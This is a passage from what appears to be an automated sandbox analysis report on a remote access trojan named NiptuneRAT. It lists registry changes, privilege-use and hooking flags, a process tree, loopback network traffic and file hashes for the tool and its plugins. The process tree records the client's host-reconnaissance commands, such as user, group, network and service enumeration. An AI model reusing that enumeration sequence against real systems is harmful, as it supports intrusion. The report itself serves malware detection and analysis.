| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 020000000100000000000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\NodeSlot = "4" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\$77NiptuneClient.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip"
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe
"C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Users\Admin\Desktop\$77NiptuneClient.exe
"C:\Users\Admin\Desktop\$77NiptuneClient.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -an
C:\Windows\system32\ipconfig.exe
ipconfig /displaydns
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\pp.anarh.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp |
| N/A | 127.0.0.1:1337 | tcp | |
| N/A | 127.0.0.1:1337 | tcp | |
| N/A | 127.0.0.1:1337 | tcp | |
| N/A | 127.0.0.1:1337 | tcp |
Files
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe
| MD5 | e05e2846c2c4eb4c218634e28031122a |
| SHA1 | daac3911d4aace4b6fcd5c6d5a2adb9950eacfd4 |
| SHA256 | 178bda21d7735ee8bc2bfb74bc487055853a451ae741b1486fda96125be8e7c4 |
| SHA512 | 181df2727abdaafb985a84588adac451b0d0031912a556a29b3e9071368022ff8119197a16171eaf43e5dfd42e9cb45c1801373a39907d8689fce40d1cc7ce39 |
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe
| MD5 | c9b1ee4563ecf0789bab3fdc31c7c346 |
| SHA1 | 370173eb922e0d3d2f1d2393ef2dac604a6abcca |
| SHA256 | 783ce12d604d80f75e89cb9b8da650fbd65890ba3ed6c4b1dde3045d0b713052 |
| SHA512 | aa78e096bfb4a8cc5ce7b30ad7fd639f2f1106b0402da8ea0941f211d909a4a17cd41b272452d602583ba0083216c1e4ac485d869b9facdd71c78153e21dc208 |
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe.config
| MD5 | 465c8716dc52edeaf09f0c61fc988934 |
| SHA1 | 9cab6cec5f46d7528323fa2ad7aa2fc1a72d689b |
| SHA256 | 1c6051caeecdd3eeb78cad1b1efa60e56be4193d76f5718c73b8fdfcd61784c5 |
| SHA512 | 0b386615940f254d6a7dd5650fc7da6544beab97d821bab8fe915dcc257729919142bbd6680b06a19f57c8c79c2c04368413fc31a7efef8e9248209f81c1cf3c |
memory/3012-163-0x00007FFAE7E50000-0x00007FFAE8912000-memory.dmp
memory/3012-164-0x0000022223CD0000-0x00000222255FA000-memory.dmp
memory/3012-165-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-166-0x000002223FB90000-0x000002223FDE2000-memory.dmp
memory/3012-167-0x0000022240200000-0x00000222403F4000-memory.dmp
memory/3012-168-0x0000022240780000-0x00000222408CE000-memory.dmp
memory/3012-169-0x0000022240910000-0x0000022240924000-memory.dmp
memory/3012-170-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-171-0x0000022249C10000-0x000002224A1F8000-memory.dmp
memory/3012-172-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-173-0x000002224A820000-0x000002224A82A000-memory.dmp
memory/3012-174-0x00007FFAE7E50000-0x00007FFAE8912000-memory.dmp
memory/3012-175-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-176-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-177-0x000002224ABB0000-0x000002224ABC2000-memory.dmp
memory/3012-178-0x000002224ABD0000-0x000002224AE50000-memory.dmp
memory/3012-188-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-189-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-190-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3012-191-0x000002224D260000-0x000002224D37E000-memory.dmp
C:\Users\Admin\Desktop\NiptuneRAT-main\Stub\Stub.exe
| MD5 | 0da861f192f8e722505826c141c05a40 |
| SHA1 | 4d717f9d2a64caf68374ed1e246cf38dd208227b |
| SHA256 | 4c6a73271e3a0794bff16fa39b45771e9e39b873e12fdc7031e03fbda238667b |
| SHA512 | 7b61ac15ba95e0b8a9ebac2f33e7137083b18204de503e7a2946af65e9d5b6ad9e826a27770e10862dc825f3e20e8bd72463593528a623c4603f9628f8c27280 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Usrs.p12
| MD5 | e22a0515af0220bc5c4497f85e518e24 |
| SHA1 | 2702b7cf46f8ae5ed920469b169c03b07a5d14e7 |
| SHA256 | 4512413f9478d03074b4bea5deaff1681ec28c74839c16f3cf7d56b0418a8f92 |
| SHA512 | cbee300346822a3cd9da43985143258085513bf4515287974f9def05c047477f313648f4017118167f30f1eb241b5c490a11128f98352f96b24f0d2e62840d92 |
C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\user.config
| MD5 | 77d636e08fe9de62cf19ad656409ccde |
| SHA1 | 827de958d0c46346c9c581be646b8c3a61fab648 |
| SHA256 | 4155b94bb3ef65ff1f15d7f337f2ada62d474ec5ba7557562618e5206e83a558 |
| SHA512 | 60712d620a884d897457f56d4ecc758c9a753c31f58fcb9d814af58dbc2e105435c9a73f837b4146e2e8edb7834b83f51dcecaaf39cd6f69be59d7bb5c28b839 |
C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\u04otmyy.newcfg
| MD5 | 67ae3b067855a1e16f01e16ee389c8f0 |
| SHA1 | 3bef83c7922cda26497a45bbfe209e65b14234a0 |
| SHA256 | 07e9e4841eeace951264cf7b4cf5e8c6993fc923b851cb2360122fe7fec2ef0a |
| SHA512 | db73d3a4a9523db12264d1cf53e50d44589af8dc83bdbb041eff8977f6134666d1836014ebde472039036a13beabe6adee026712f385453ed654ae5ac504e699 |
C:\Users\Admin\Desktop\$77NiptuneClient.exe
| MD5 | 94ac7fdf09c22c9bfd33c451adfc1681 |
| SHA1 | 7bb6e40d7d2492d09b281fcd64ec94aa47d75e96 |
| SHA256 | f7446c1f2f1f0b7882ea06a028c77e17898cdd81b13ad6fd0b92c6d3377bbb9d |
| SHA512 | a532faabbe374c8ceb32d7fd8dc41b853c97e6a5831fbbb0dccfc46dbcc28ed9225959bc4bb2468379d53a0e8548ee592468e1c564f16e1a830205aafe1ca1c2 |
memory/3356-226-0x0000000000500000-0x0000000000516000-memory.dmp
memory/3356-227-0x00007FFAE7E50000-0x00007FFAE8912000-memory.dmp
memory/3012-228-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3356-229-0x000000001B2B0000-0x000000001B2C0000-memory.dmp
memory/3012-230-0x00000222274A0000-0x00000222274B0000-memory.dmp
memory/3356-231-0x00007FFB09280000-0x00007FFB09489000-memory.dmp
memory/3012-233-0x00000222274A0000-0x00000222274B0000-memory.dmp
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\RssCnLKcGRxj.dll
| MD5 | f6808c4fbbe0275db03b2cc5b4c2bc0d |
| SHA1 | e40b61c64c68f72fc5144f5057d54229babdecf8 |
| SHA256 | e204d15f0e7269d364157aaab265a5dfbe7e76c9f6202bf90998f0edd77ca248 |
| SHA512 | f077c49f6943d0e40799b3b42d1e11f50dabca48305c36ef2acd3258c990e0e0f982fbb0c27b1243aa15d2ed7b398b70f07dddc9ba76ff032ba74a24c8e08fb4 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\0guo3zbo66fqoG.dll
| MD5 | e4ebcf76ff80ef398d3ab77d577f4c08 |
| SHA1 | cb9e6b30a63d50ae87610f6855b64abfb25691d2 |
| SHA256 | 9661b1abc9a3e95e591c49c3838a64a066a2ff3c6de08d8aa7b541c4a75cd8e5 |
| SHA512 | 8f37cedd987dd14181fdfa861b8a95271868dac21aa9df80bd6daa831ae20f4b4965c8be3e36f32aa220bd37ded11a7568ae237c9c9641bb4fc087f6fe104b01 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\59Zp7paEHDF7luJ.dll
| MD5 | 6b24cb03ca441f81764f14412abe22c4 |
| SHA1 | 37eefe413b01080c85f437e5845add5f9e3c2c10 |
| SHA256 | 057313c967420c8a6ef644a78109af3f681fb332f9e8ebb55e4a29efeb093afe |
| SHA512 | 9ef792c0b90f6eb1a6ed23402fd19bcf7ddb48ec0b7a18eaf7d708e873a060b4698e3174400162f2436a0180ebac72400883dd5cebe246a8690a053a431877a7 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Audio.dll
| MD5 | cf863d12b476133d97f3827007f53fa1 |
| SHA1 | 97478287ae4ad542671fce20b39ccc47c230b5d8 |
| SHA256 | 9e80ce9cd2c8d4b15a1f7326a0b6674f3da617f4704cf5a49bb99b7dceed1b5e |
| SHA512 | 9ebfab2f4af63b69156aacbdd6e9f4ff581bb7c1cbf0d4d1f7faa35c838fcfbc77446ae3c735f8bb927c744ae81d9645b2c11c365ac49bb8732523520712ed5d |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\K8oCBS3ThnW0WP.dll
| MD5 | 081ea64eb8b4f333014276d59fdec0b4 |
| SHA1 | 0791627bb38d6818ceb2bf419f19376aef14e494 |
| SHA256 | b5022706fec021abf416d4b4f806485a2915f3a47b71e73241ef73e7845b21f9 |
| SHA512 | b5b9e2c1927313919de6ddc8cc5ddc3438846be8817e022f964ec52612f6ad5301a83c88888fffa1cdabc9a29f42431a4c84668987edb32b4bd6587d64dedd54 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\G3nl0mDcABnDuZ.dll
| MD5 | 7884b35cfe1ba24ad7e4cd78f48a1a09 |
| SHA1 | 86cf35919ead978c5fe817d6c4f2e18bb32727fb |
| SHA256 | ed4562e5b6527f2ebb2318f83f31a3af4dbe06dbf8e764ebf5706b0790346b88 |
| SHA512 | 30a57bc171ec76c7295766df01f8970ff98dbb3a13a5c52a1e75329fb45b69b7fa8c199da0cb6648258b90c48c3341c3bde73088e773f5037f3de323192bcf8f |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\FBSyChwp.dll
| MD5 | 841ff739bd70a4c6f61a43793feea007 |
| SHA1 | ec73f4b50c2e36568bfb21b3f87cb8ca55ae5722 |
| SHA256 | cda6e05e54f1da8511958683aa100eb4bc6bb749ad4699676755dda18c152d84 |
| SHA512 | 086c1ac156b380ce850dcbbbd3ca59477953f665dc592944d851e89aa17f846c94a1003b57f5c842cf3e5536523828b407ee2a0b170f01605d7d72eb5c7db2f8 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\EVa7gBMKoaHmLC.dll
| MD5 | ec4f4d4e9f133b53f5cab8a01193bdbc |
| SHA1 | 8a9539f232f1ee7437308af216c80efef434b3d7 |
| SHA256 | 63b132fb283869799d218b453ba8a032b5a2fea372a27871326536776fae9481 |
| SHA512 | 009967c45320248cbc5dab177f725c8b91e1f540e4651cfc59e25137f8c9933a84580f364057d1f6c11efd783b2bd782ecf7274ef6cf3a45252cf65ae339c6b3 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\KNTmoSnG.AnarHs.dll
| MD5 | 1681e0f3311751361030ff30a957a1ed |
| SHA1 | 8f3b55e130af507549817fda37474a1391e6b8f2 |
| SHA256 | 234724f14dbb999853aeb872d7e6c3ed0b3de5b105009b5c66131a2af8d0dbb4 |
| SHA512 | 60690b2c1e2816a640f5763f9c20de9a39cb9735ea4a3f0bf4f477d3e184f8791e556313a7523c70ed2fb9182d520842bce70057cedd5cb89b923fd6f9067dd1 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\maSN8TBMgUEC.dll
| MD5 | d5a278acdafa0c8b4380efb7d83e053e |
| SHA1 | 376218e3aa607a3b82be55cfa718826991953654 |
| SHA256 | d93d72c6e929bd9cea468458e6c0558908a92f0ecd11f4f4db0f49acfe9d4fc5 |
| SHA512 | 138def485e02fdcf1809f0d8162fdd2a50575f3cab56968fbc6d09d0c1e9fe6803860315e45c1a7e0eff75958988ed6b08735fa680fa66527630c6789a23a00b |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\oYsKwDG.dll
| MD5 | 19f8d8099cc9b7b6a68e7efebc44ac18 |
| SHA1 | 5a5cca2ad1168252d79ef7c0ffda58726de7f79c |
| SHA256 | 9157a6021901939611c80c4246dbec6007200b2f2457d348ce8834bef9872535 |
| SHA512 | 6bb58b3157feb010555382c5b5b5d0ee982af324f1d88512ea5d5b984b949995d7387a9496388cb7b9589007ae9ec651e5f8219085517d82eef093e4ebb7ecbc |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\mML6WKMqdxjDGA.dll
| MD5 | e03b206eec8a7efbd1a47909071226e5 |
| SHA1 | 21163989ea524920e874bc7932adfcd5e94f854e |
| SHA256 | 778877431354a9584325dadb663be077f757227eaae8bcad33e4bf26efd6b965 |
| SHA512 | 831ed74419f1b4c3250fbff20be16ed7058a851d7168a17e8a4dcf284a19412feee42a8c198af34b37571de33a80c48ac855f5d018ea9e2cfdcd846b832155ff |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\PK0TcnqTGFagQTS.dll
| MD5 | fa90a2aee0d172000257c4faca31237c |
| SHA1 | b317281b4acaaf1d7b7255c5e92887322abae892 |
| SHA256 | 991fc53fa1aa7b5cd0b6e19dab536873d68e4413fd55b533601a3a2582d38a49 |
| SHA512 | b05c0b52e011089258ad31dd23a1f8a0cc8145b202e42e2a9d4fdf892c12d4a7b5843cc7721041295ab796e8bc98747b9e321c4e54bfd1a7c9a02dd2796fc405 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Recovery.dll
| MD5 | 08131d6801c109f0764a4fe690aba8ef |
| SHA1 | e732af02326483700eda52ff40dc70cff6b7afcb |
| SHA256 | bc3a9390c043f8002e356ad34b2b11d3486682d0c275ab6729bb4a312e324f51 |
| SHA512 | 228ab0aa0ddfdb0c099f1db5112304d776cb97ab2dab376d38023e446cb2aec30d9585eba444818f3241ffbc28565a1aef11f97b5b42bf57037de8e4a8536e2a |
memory/3356-248-0x000000001D0C0000-0x000000001D136000-memory.dmp
memory/3356-249-0x00000000026C0000-0x00000000026F4000-memory.dmp
memory/3356-250-0x000000001B200000-0x000000001B21E000-memory.dmp
memory/3012-251-0x000002224C6E0000-0x000002224C7E0000-memory.dmp
memory/3356-252-0x00007FFAE7E50000-0x00007FFAE8912000-memory.dmp
memory/3356-253-0x000000001B240000-0x000000001B272000-memory.dmp
memory/3356-254-0x000000001B2B0000-0x000000001B2C0000-memory.dmp
memory/3356-255-0x000000001B2B0000-0x000000001B2C0000-memory.dmp
memory/3356-256-0x00007FFB09280000-0x00007FFB09489000-memory.dmp
memory/3356-258-0x000000001D240000-0x000000001D270000-memory.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/3012-262-0x000002224C6E0000-0x000002224C7E0000-memory.dmp
memory/3356-263-0x000000001B2B0000-0x000000001B2C0000-memory.dmp
C:\Users\Admin\Desktop\pp.anarh.txt
| MD5 | 9be9355dfef9f635bef4a94e4c040209 |
| SHA1 | b69a9fccf3391e898dbf8755ef71f7fc52e15880 |
| SHA256 | 9017a399259db69ba7e4a84f38843ca91df676a0b44ecec5ef884f83ed5fd44f |
| SHA512 | ad8dd6525d98214eb92c825bff6a197a7fe8bdda37f7b608725b4dc14780570104a0a2726ab971358b9b0ac40b8499b852b96d60a3aded254487d1c3f369b410 |